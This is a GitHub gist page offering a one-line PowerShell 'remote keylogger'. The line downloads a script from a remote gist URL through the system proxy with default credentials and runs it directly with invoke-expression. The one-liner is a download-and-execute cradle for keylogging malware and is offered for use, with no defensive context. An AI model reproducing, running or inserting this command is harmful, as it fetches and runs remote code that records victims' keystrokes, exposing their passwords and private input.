Created
February 25, 2021 12:09
-
-
Save AddaxSoft/35e095b9e62959a8ccdeb23f6db51bd1 to your computer and use it in GitHub Desktop.
simple and effective 1-liner remote keylogger using PowerShell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$url="https://gist.githubusercontent.com/dasgoll/7ca1c059dd3b3fbc7277/raw/e4e3a530589dac67ab6c4c2428ea90de93b86018/gistfile1.txt"; $p=[System.Net.WebRequest]::GetSystemWebProxy();$p.Credentials=[System.Net.CredentialCache]::DefaultCredentials; $c=new-object system.net.WebClient;$c.proxy=$p;$x=$c.downloadstring($url);invoke-expression $x; |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment